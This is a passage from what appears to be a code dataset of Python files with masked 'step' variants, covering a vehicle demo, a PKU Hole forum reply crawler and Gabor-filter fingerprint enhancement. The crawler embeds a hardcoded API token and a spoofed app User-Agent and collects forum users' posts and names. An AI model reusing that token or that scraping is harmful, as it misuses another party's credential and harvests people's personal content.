Vehicle(\"Ducati\", 12, 3)\nwhile i <= 20:\n motorcycle.accelerate()\n motorcycle.move()\n i += 1\n# motorcycle.accelerate()\n# motorcycle.move()\n# motorcycle.accelerate()\n# motorcycle.move()\n# motorcycle.accelerate()\n# motorcycle.move()\n# motorcycle.accelerate()\n# motorcycle.move()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import urllib.request
import http.cookiejar
import requests
import re
import sys
import time
import json
from bs4 import BeautifulSoup
# HTTP request headers mimicking the official PKU Helper iOS app (v2.3.8).
# NOTE(review): the server presumably gates the API on this User-Agent —
# confirm before changing any of these values.
head = {
    "Host": "www.pkuhelper.com",
    "Accept": "*/*",
    "Accept-Language": "zh-Hans-CN;q=1",
    "Connection": "keep-alive",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)"
}
# PKU Hole API endpoint, addressed by raw IP (the Host header above still
# names www.pkuhelper.com).
url = "http://162.105.205.61/services/pkuhole/api.php"
#树洞回复爬虫,爬取树洞回复号、内容、姓名
def crawler(pid):
    """Fetch all replies (comments) of one tree-hole post.

    Args:
        pid: id of the post whose comments are fetched.

    Returns:
        (cids, texts, names): parallel lists of reply ids (int), reply
        bodies, and poster names. On failure the lists collected so far
        (possibly empty) are returned instead of raising.
    """
    print("hole reply start!")
    cids = []
    texts = []
    names = []
    try:
        para = {"action": "getcomment", "pid": pid, "token": "pnh3dmks5fmo00u0177qplsre44qo4fk"}
        r = requests.get(url, headers=head, params=para)
        data = json.loads(r.text)["data"]
        for t in data:
            cids.append(int(t["cid"]))
            texts.append(t["text"])
            names.append(t["name"])
        print("hole reply end!")
        return cids, texts, names
    # Narrowed from a bare ``except`` (which also swallowed
    # KeyboardInterrupt/SystemExit): covers network failures, malformed
    # JSON, and an unexpected response schema.
    except (requests.RequestException, ValueError, KeyError, TypeError):
        print("HOLE REPLY ERROR!!!!!!")
        return cids, texts, names
|
normal
|
{
"blob_id": "a74653f01b62445c74c8121739bd9185ce21c85a",
"index": 2764,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef crawler(pid):\n print('hole reply start!')\n cids = []\n texts = []\n names = []\n try:\n para = {'action': 'getcomment', 'pid': pid, 'token':\n 'pnh3dmks5fmo00u0177qplsre44qo4fk'}\n r = requests.get(url, headers=head, params=para)\n data = json.loads(r.text)['data']\n for t in data:\n cids.append(int(t['cid']))\n texts.append(t['text'])\n names.append(t['name'])\n print('hole reply end!')\n return cids, texts, names\n except:\n print('HOLE REPLY ERROR!!!!!!')\n return cids, texts, names\n",
"step-3": "<mask token>\nhead = {'Host': 'www.pkuhelper.com', 'Accept': '*/*', 'Accept-Language':\n 'zh-Hans-CN;q=1', 'Connection': 'keep-alive', 'Accept-Encoding':\n 'gzip, deflate', 'User-Agent':\n 'PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)'}\nurl = 'http://162.105.205.61/services/pkuhole/api.php'\n\n\ndef crawler(pid):\n print('hole reply start!')\n cids = []\n texts = []\n names = []\n try:\n para = {'action': 'getcomment', 'pid': pid, 'token':\n 'pnh3dmks5fmo00u0177qplsre44qo4fk'}\n r = requests.get(url, headers=head, params=para)\n data = json.loads(r.text)['data']\n for t in data:\n cids.append(int(t['cid']))\n texts.append(t['text'])\n names.append(t['name'])\n print('hole reply end!')\n return cids, texts, names\n except:\n print('HOLE REPLY ERROR!!!!!!')\n return cids, texts, names\n",
"step-4": "import urllib.request\nimport http.cookiejar\nimport requests\nimport re\nimport sys\nimport time\nimport json\nfrom bs4 import BeautifulSoup\nhead = {'Host': 'www.pkuhelper.com', 'Accept': '*/*', 'Accept-Language':\n 'zh-Hans-CN;q=1', 'Connection': 'keep-alive', 'Accept-Encoding':\n 'gzip, deflate', 'User-Agent':\n 'PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)'}\nurl = 'http://162.105.205.61/services/pkuhole/api.php'\n\n\ndef crawler(pid):\n print('hole reply start!')\n cids = []\n texts = []\n names = []\n try:\n para = {'action': 'getcomment', 'pid': pid, 'token':\n 'pnh3dmks5fmo00u0177qplsre44qo4fk'}\n r = requests.get(url, headers=head, params=para)\n data = json.loads(r.text)['data']\n for t in data:\n cids.append(int(t['cid']))\n texts.append(t['text'])\n names.append(t['name'])\n print('hole reply end!')\n return cids, texts, names\n except:\n print('HOLE REPLY ERROR!!!!!!')\n return cids, texts, names\n",
"step-5": "import urllib.request\nimport http.cookiejar\nimport requests\nimport re\nimport sys\nimport time\nimport json\nfrom bs4 import BeautifulSoup\n\nhead = {\n\t\"Host\": \"www.pkuhelper.com\",\n\t\"Accept\": \"*/*\",\n\t\"Accept-Language\": \"zh-Hans-CN;q=1\",\n\t\"Connection\": \"keep-alive\",\n\t\"Accept-Encoding\": \"gzip, deflate\",\n\t\"User-Agent\": \"PKU Helper/2.3.8 (iPhone; iOS 12.1; Scale/3.00)\"\n}\nurl = \"http://162.105.205.61/services/pkuhole/api.php\"\n\n#树洞回复爬虫,爬取树洞回复号、内容、姓名\ndef crawler(pid):\n\tprint(\"hole reply start!\")\n\tcids = []\n\ttexts = []\n\tnames = []\n\n\ttry:\n\t\tpara = {\"action\": \"getcomment\", \"pid\": pid, \"token\": \"pnh3dmks5fmo00u0177qplsre44qo4fk\"}\n\t\tr = requests.get(url, headers=head, params=para)\n\t\tdata = json.loads(r.text)[\"data\"]\n\t\tfor t in data:\n\t\t\tcids.append(int(t[\"cid\"]))\n\t\t\ttexts.append(t[\"text\"])\n\t\t\tnames.append(t[\"name\"])\n\n\t\tprint(\"hole reply end!\")\n\n\t\treturn cids, texts, names\n\texcept:\n\t\tprint(\"HOLE REPLY ERROR!!!!!!\")\n\t\treturn cids, texts, names",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
python3
description :Fingerprint image enhancement by using gabor
"""
import os
import cv2
import math
import scipy
import numpy as np
from scipy import signal
def normalise(img):
    """Return *img* shifted and scaled to zero mean and unit variance."""
    mean = np.mean(img)
    std = np.std(img)
    return (img - mean) / std
def ridge_segment(im, blksze, thresh):
    """Normalise *im* and compute a ridge-region mask.

    The image is tiled into blksze x blksze blocks; a block whose
    grey-level standard deviation exceeds *thresh* is treated as ridge
    region (background blocks are nearly uniform).

    Args:
        im: 2-D greyscale fingerprint image.
        blksze: side length of the analysis blocks, in pixels.
        thresh: std-dev threshold separating ridge blocks from background.

    Returns:
        (normim, mask): the image normalised to zero mean / unit std over
        the masked region, and the boolean ridge mask.
    """
    rows, cols = im.shape
    im = normalise(im)
    # Pad to an exact multiple of the block size.
    # NOTE: np.int was removed in NumPy 1.24; the builtin int is equivalent.
    new_rows = int(blksze * np.ceil(rows / blksze))
    new_cols = int(blksze * np.ceil(cols / blksze))
    padded_img = np.zeros((new_rows, new_cols))
    stddevim = np.zeros((new_rows, new_cols))
    padded_img[0:rows][:, 0:cols] = im
    # Fill every block of stddevim with that block's standard deviation.
    for i in range(0, new_rows, blksze):
        for j in range(0, new_cols, blksze):
            block = padded_img[i:i + blksze][:, j:j + blksze]
            stddevim[i:i + blksze][:, j:j +
                                   blksze] = np.std(block) * np.ones(block.shape)
    stddevim = stddevim[0:rows][:, 0:cols]
    mask = stddevim > thresh
    # Re-normalise using statistics of the ridge region only.
    mean_val = np.mean(im[mask])
    std_val = np.std(im[mask])
    normim = (im - mean_val) / (std_val)
    return (normim, mask)
def ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):
    """Estimate the ridge orientation at every pixel of *im*.

    Args:
        im: normalised 2-D fingerprint image.
        gradientsigma: sigma of the Gaussian used to compute gradients.
        blocksigma: sigma of the Gaussian smoothing the covariance data.
        orientsmoothsigma: sigma for smoothing the orientation field;
            smoothing is skipped when falsy.

    Returns:
        Orientation image in radians.
    """
    # Calculate image gradients via derivative-of-Gaussian filters.
    # NOTE: np.int was removed in NumPy 1.24; the builtin int is equivalent.
    sze = np.fix(6 * gradientsigma)
    if np.remainder(sze, 2) == 0:
        sze = sze + 1
    gauss = cv2.getGaussianKernel(int(sze), gradientsigma)
    f = gauss * gauss.T
    fy, fx = np.gradient(f)  # Gradient of Gaussian
    Gx = signal.convolve2d(im, fx, mode='same')
    Gy = signal.convolve2d(im, fy, mode='same')
    Gxx = np.power(Gx, 2)
    Gyy = np.power(Gy, 2)
    Gxy = Gx * Gy
    # Smooth the covariance data to perform a weighted summation of the data.
    sze = np.fix(6 * blocksigma)
    gauss = cv2.getGaussianKernel(int(sze), blocksigma)
    f = gauss * gauss.T
    Gxx = scipy.ndimage.convolve(Gxx, f)
    Gyy = scipy.ndimage.convolve(Gyy, f)
    Gxy = 2 * scipy.ndimage.convolve(Gxy, f)
    # Analytic solution of the principal direction.
    denom = np.sqrt(np.power(Gxy, 2) + np.power((Gxx - Gyy), 2)
                    ) + np.finfo(float).eps
    sin2theta = Gxy / denom  # Sine and cosine of doubled angles
    cos2theta = (Gxx - Gyy) / denom
    if orientsmoothsigma:
        sze = np.fix(6 * orientsmoothsigma)
        if np.remainder(sze, 2) == 0:
            sze = sze + 1
        gauss = cv2.getGaussianKernel(int(sze), orientsmoothsigma)
        f = gauss * gauss.T
        # Smoothed sine and cosine of doubled angles.
        cos2theta = scipy.ndimage.convolve(cos2theta, f)
        sin2theta = scipy.ndimage.convolve(sin2theta, f)
    orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2
    return (orientim)
def frequest(im, orientim, windsze, minWaveLength, maxWaveLength):
    """Estimate the ridge frequency within a single image block.

    Returns an image of the same shape as *im* filled with the estimated
    frequency, or zeros when no valid wavelength could be measured.
    """
    n_rows, _ = np.shape(im)

    # Mean orientation: average sines/cosines of the doubled angles
    # before reconstructing the angle, avoiding wraparound at the origin.
    mean_cos = np.mean(np.cos(2 * orientim))
    mean_sin = np.mean(np.sin(2 * orientim))
    block_angle = math.atan2(mean_sin, mean_cos) / 2

    # Rotate the block so that the ridges run vertically.
    rotated = scipy.ndimage.rotate(
        im, block_angle / np.pi * 180 + 90, axes=(1, 0),
        reshape=False, order=3, mode='nearest')

    # Crop the centre so no invalid (rotated-in) pixels pollute the
    # column projection.
    crop = int(np.fix(n_rows / np.sqrt(2)))
    off = int(np.fix((n_rows - crop) / 2))
    rotated = rotated[off:off + crop][:, off:off + crop]

    # Project grey values down the (now vertical) ridges and locate peaks.
    proj = np.sum(rotated, axis=0)
    dilated = scipy.ndimage.grey_dilation(
        proj, windsze, structure=np.ones(windsze))
    peak_thresh = 2
    is_peak = (np.abs(dilated - proj) < peak_thresh) & (proj > np.mean(proj))
    peak_idx = np.where(is_peak)
    _, n_peaks = np.shape(peak_idx)

    # Fewer than two peaks, or a wavelength outside the allowed bounds,
    # yields a zero frequency image.
    if n_peaks < 2:
        return np.zeros(im.shape)
    wave_len = (peak_idx[0][n_peaks - 1] - peak_idx[0][0]) / (n_peaks - 1)
    if minWaveLength <= wave_len <= maxWaveLength:
        return 1 / np.double(wave_len) * np.ones(im.shape)
    return np.zeros(im.shape)
def ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength):
    """Estimate the ridge frequency over the whole image, block by block.

    Args:
        im: normalised 2-D fingerprint image.
        mask: boolean ridge-region mask from ridge_segment().
        orient: per-pixel orientation image from ridge_orient().
        blksze: side length of the estimation blocks.
        windsze: dilation window used for peak detection in frequest().
        minWaveLength, maxWaveLength: accepted ridge wavelength bounds.

    Returns:
        (freq, meanfreq): per-pixel frequency image (zero outside the
        mask) and the mean of its non-zero entries.
    """
    rows, cols = im.shape
    freq = np.zeros((rows, cols))
    # Estimate a frequency for every block from its local orientation.
    for r in range(0, rows - blksze, blksze):
        for c in range(0, cols - blksze, blksze):
            blkim = im[r:r + blksze][:, c:c + blksze]
            blkor = orient[r:r + blksze][:, c:c + blksze]
            freq[r:r + blksze][:, c:c + blksze] = frequest(
                blkim, blkor, windsze, minWaveLength, maxWaveLength)
    # Keep estimates only inside the ridge mask, then average the
    # non-zero entries. (An unused median estimate, flagged in the
    # original as "does not work properly", has been removed.)
    freq = freq * mask
    freq_1d = np.reshape(freq, (1, rows * cols))
    ind = np.array(np.where(freq_1d > 0))[1, :]
    non_zero_elems_in_freq = freq_1d[0][ind]
    meanfreq = np.mean(non_zero_elems_in_freq)
    return freq, meanfreq
def ridge_filter(im, orient, freq, kx, ky):
    """Enhance ridges by filtering each pixel with an oriented Gabor filter.

    Args:
        im: normalised 2-D fingerprint image.
        orient: per-pixel ridge orientation in radians.
        freq: per-pixel ridge frequency (zero where unknown).
        kx, ky: bandwidth factors scaling the Gaussian envelope relative
            to the ridge wavelength.

    Returns:
        The filtered image (float), same shape as *im*.
    """
    angleInc = 3  # angular quantisation of the filter bank, in degrees
    im = np.double(im)
    rows, cols = im.shape
    new_im = np.zeros((rows, cols))
    freq_1d = np.reshape(freq, (1, rows * cols))
    ind = np.array(np.where(freq_1d > 0))[1, :]
    # Round frequencies to the nearest 0.01 to reduce the number of
    # distinct values we must build filters for.
    non_zero_elems_in_freq = freq_1d[0][ind]
    non_zero_elems_in_freq = np.double(
        np.round((non_zero_elems_in_freq * 100))) / 100
    unfreq = np.unique(non_zero_elems_in_freq)
    # Base (unrotated) Gabor filter for the dominant frequency.
    sigmax = 1 / unfreq[0] * kx
    sigmay = 1 / unfreq[0] * ky
    # BUGFIX: np.round returns a float and modern NumPy rejects a float
    # sample count in np.linspace; cast once here (the original cast to
    # int later anyway).
    sze = int(np.round(3 * np.max([sigmax, sigmay])))
    x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1),
                       np.linspace(-sze, sze, 2 * sze + 1))
    reffilter = np.exp(-((np.power(x, 2)) / (sigmax * sigmax) + (np.power(y, 2)) / (sigmay * sigmay))
                       ) * np.cos(2 * np.pi * unfreq[0] * x)  # the original Gabor filter
    filt_rows, filt_cols = reffilter.shape
    gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))
    for o in range(0, 180 // angleInc):
        # The orientation image gives the direction *along* the ridges
        # (hence +90), and rotate() is anticlockwise-positive (hence the
        # minus sign).
        rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90), reshape=False)
        gabor_filter[o] = rot_filt
    # Valid pixels: frequency known and farther than the filter radius
    # from the image boundary.
    maxsze = sze
    temp = freq > 0
    validr, validc = np.where(temp)
    final_temp = ((validr > maxsze) & (validr < rows - maxsze) &
                  (validc > maxsze) & (validc < cols - maxsze))
    finalind = np.where(final_temp)
    # Map each orientation (radians) to an index into the filter bank,
    # wrapped into [1, maxorient_index].
    maxorient_index = np.round(180 / angleInc)
    orient_index = np.round(orient / np.pi * 180 / angleInc)
    for i in range(0, rows):
        for j in range(0, cols):
            if orient_index[i][j] < 1:
                orient_index[i][j] = orient_index[i][j] + maxorient_index
            if orient_index[i][j] > maxorient_index:
                orient_index[i][j] = orient_index[i][j] - maxorient_index
    # Filter each valid pixel's neighbourhood with its oriented filter.
    finalind_rows, finalind_cols = np.shape(finalind)
    for k in range(0, finalind_cols):
        r = validr[finalind[0][k]]
        c = validc[finalind[0][k]]
        img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]
        new_im[r][c] = np.sum(
            img_block * gabor_filter[int(orient_index[r][c]) - 1])
    return new_im
def image_enhance(img):
    """Run the full fingerprint-enhancement pipeline on *img*.

    Segments the ridge region, estimates orientation and frequency, then
    applies oriented Gabor filtering. Returns a boolean ridge image
    (True where the filtered response is below -3).
    """
    # Normalise the image and find the region of interest.
    seg_blksze = 16
    seg_thresh = 0.1
    normim, mask = ridge_segment(img, seg_blksze, seg_thresh)

    # Per-pixel ridge orientation field.
    gradientsigma = 1
    blocksigma = 7
    orientsmoothsigma = 7
    orientim = ridge_orient(
        normim, gradientsigma, blocksigma, orientsmoothsigma)

    # Overall ridge frequency, then broadcast the mean over the mask.
    freq, medfreq = ridge_freq(normim, mask, orientim, 38, 5, 5, 15)
    freq = medfreq * mask

    # Gabor filtering tuned to the estimated frequency and orientation.
    kx = ky = 0.65
    filtered = ridge_filter(normim, orientim, freq, kx, ky)
    return (filtered < -3)
def gabor_enhance(in_path, out_dir='./'):
    """Enhance a fingerprint image file and write the result as a PNG.

    Args:
        in_path: path of the input greyscale fingerprint image.
        out_dir: directory the enhanced image is written into.

    Returns:
        Path of the written ``<prefix>_enhanced.png`` file, where
        ``<prefix>`` is the input basename truncated at '_normal'.
    """
    img = cv2.imread(in_path, 0)
    enhanced_img = image_enhance(img)
    enhanced_img = np.invert(enhanced_img)
    # Boolean mask -> 8-bit range (True becomes 255).
    img = enhanced_img * 255
    base_image_name = os.path.splitext(os.path.basename(in_path))[0]
    prefix = base_image_name.split('_normal')[0]
    # BUGFIX: use os.path.join instead of string concatenation, which
    # silently produced 'dirprefix...' when out_dir lacked a trailing
    # separator. Identical result for the default './'.
    img_out = os.path.join(out_dir, prefix + '_enhanced.png')
    cv2.imwrite(img_out, img)
    return img_out
|
normal
|
{
"blob_id": "9447d0d0481df3d0ee4273256d02977bc8044e4e",
"index": 8603,
"step-1": "<mask token>\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = 
np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 
180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / np.std(img)\n return normed\n\n\n<mask token>\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n fy, fx = np.gradient(f)\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n sze = np.fix(6 * blocksigma)\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n denom = np.sqrt(np.power(Gxy, 2) + np.power(Gxx - Gyy, 2)) + np.finfo(float\n ).eps\n sin2theta = Gxy / denom\n cos2theta = (Gxx - Gyy) / denom\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f)\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return orientim\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n rotim = scipy.ndimage.rotate(im, orient / np.pi * 180 + 90, axes=(1, 0),\n reshape=False, order=3, mode='nearest')\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(proj, windsze, structure=np.ones\n (windsze))\n temp = np.abs(dilation - proj)\n peak_thresh = 2\n maxpts = (temp 
< peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n rows_maxind, cols_maxind = np.shape(maxind)\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks -\n 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength\n ):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n freq[r:r + blksze][:, c:c + blksze] = frequest(blkim, blkor,\n windsze, minWaveLength, maxWaveLength)\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n meanfreq = np.mean(non_zero_elems_in_freq)\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n ind = np.array(ind)\n ind = ind[1, :]\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(np.round(non_zero_elems_in_freq * 100)\n ) / 100\n unfreq = np.unique(non_zero_elems_in_freq)\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n sze = np.round(3 * np.max([sigmax, sigmay]))\n x, y = np.meshgrid(np.linspace(-sze, sze, 2 * sze + 1), np.linspace(-\n sze, sze, 2 * sze + 1))\n reffilter = np.exp(-(np.power(x, 2) / (sigmax * sigmax) + np.power(y, 2\n ) / (sigmay * sigmay))) * np.cos(2 * np.pi * unfreq[0] * x)\n filt_rows, filt_cols = 
reffilter.shape\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n for o in range(0, 180 // angleInc):\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90),\n reshape=False)\n gabor_filter[o] = rot_filt\n maxsze = int(sze)\n temp = freq > 0\n validr, validc = np.where(temp)\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n final_temp = temp1 & temp2 & temp3 & temp4\n finalind = np.where(final_temp)\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n new_im[r][c] = np.sum(img_block * gabor_filter[int(orient_index[r][\n c]) - 1])\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n normim, mask = ridge_segment(img, blksze, thresh)\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n orientim = ridge_orient(normim, gradientsigma, blocksigma,\n orientsmoothsigma)\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = 